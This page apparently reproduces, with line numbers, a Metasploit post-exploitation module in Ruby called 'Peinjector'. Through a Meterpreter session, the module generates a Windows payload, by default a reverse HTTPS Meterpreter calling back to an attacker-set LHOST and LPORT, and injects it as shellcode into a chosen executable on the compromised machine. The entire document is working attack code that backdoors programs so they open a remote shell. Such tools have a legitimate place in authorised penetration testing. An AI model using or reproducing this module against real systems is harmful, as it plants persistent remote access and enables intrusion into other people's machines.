Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
require 'rex'
2

3
class MetasploitModule < Msf::Post
4

5
  include Msf::Post::Common
6

7
  def initialize(info = {})
8
    super(
9
      update_info(
10
        info,
11
        'Name' => 'Peinjector',
12
        'Description' => %q{
13
          This module will inject a specified windows payload into a target executable.
14
        },
15
        'License' => MSF_LICENSE,
16
        'Author' => [ 'Maximiliano Tedesco <[email protected]>'],
17
        'Platform' => [ 'win' ],
18
        'SessionTypes' => [ 'meterpreter' ],
19
        'Compat' => {
20
          'Meterpreter' => {
21
            'Commands' => %w[
22
              peinjector_inject_shellcode
23
            ]
24
          }
25
        }
26
      )
27
    )
28

29
    register_options(
30
      [
31
        OptString.new('PAYLOAD', [false, 'Windows Payload to inject into the targer executable.', 'windows/meterpreter/reverse_https']),
32
        OptAddress.new('LHOST', [true, 'IP of host that will receive the connection from the payload.']),
33
        OptInt.new('LPORT', [false, 'Port for Payload to connect to.', 4433]),
34
        OptString.new('TARGETPE', [false, 'Path of the target executable to be injected']),
35
        OptString.new('OPTIONS', [false, "Comma separated list of additional options for payload if needed in \'opt=val,opt=val\' format."])
36
      ]
37
    )
38
  end
39

40
  # Run Method for when run command is issued
41
  def run
42
    session.core.use('peinjector')
43

44
    # syinfo is only on meterpreter sessions
45
    print_status("Running module against #{sysinfo['Computer']}") if !sysinfo.nil?
46

47
    # Check that the payload is a Windows one and on the list
48
    if !session.framework.payloads.module_refnames.grep(/windows/).include?(datastore['PAYLOAD'])
49
      print_error("The Payload specified #{datastore['PAYLOAD']} is not a valid for this system")
50
      return
51
    end
52

53
    # Set variables
54
    pay_name = datastore['PAYLOAD']
55
    lhost = datastore['LHOST']
56
    lport = datastore['LPORT']
57
    targetpe = datastore['TARGETPE']
58
    opts = datastore['OPTIONS']
59

60
    # Create payload
61
    payload = create_payload(pay_name, lhost, lport, opts)
62

63
    # Inject payload
64
    inject_payload(payload, targetpe)
65
  end
66

67
  # Create a payload given a name, lhost and lport, additional options
68
  def create_payload(name, lhost, lport, opts = '')
69
    pay = client.framework.payloads.create(name)
70
    pay.datastore['LHOST'] = lhost
71
    pay.datastore['LPORT'] = lport
72
    pay.datastore['EXITFUNC'] = 'thread'
73
    pay.available_space = 1.gigabyte # this is to generate a proper uuid and make the payload to work with the universal handler
74

75
    if !opts.blank?
76
      opts.split(',').each do |o|
77
        opt, val = o.split('=', 2)
78
        pay.datastore[opt] = val
79
      end
80
    end
81
    # Validate the options for the module
82
    pay.options.validate(pay.datastore)
83
    return pay
84
  end
85

86
  def inject_payload(pay, targetpe)
87
    print_status('Generating payload')
88
    raw = pay.generate
89
    param = {}
90

91
    if pay.arch.join == ARCH_X64
92
      threaded_shellcode = client.peinjector.add_thread_x64(raw)
93
      param[:isx64] = true
94
    else
95
      threaded_shellcode = client.peinjector.add_thread_x86(raw)
96
      param[:isx64] = false
97
    end
98

99
    param[:shellcode] = threaded_shellcode
100
    param[:targetpe] = targetpe
101
    param[:size] = threaded_shellcode.length
102

103
    print_status("Injecting #{pay.name} into the executable #{param[:targetpe]}")
104
    client.peinjector.inject_shellcode(param)
105
    print_good("Successfully injected payload into the executable: #{param[:targetpe]}")
106
  rescue ::Exception => e
107
    print_error("Failed to Inject Payload to executable #{param[:targetpe]}!")
108
    print_error(e.to_s)
109
  end
110
end
111

112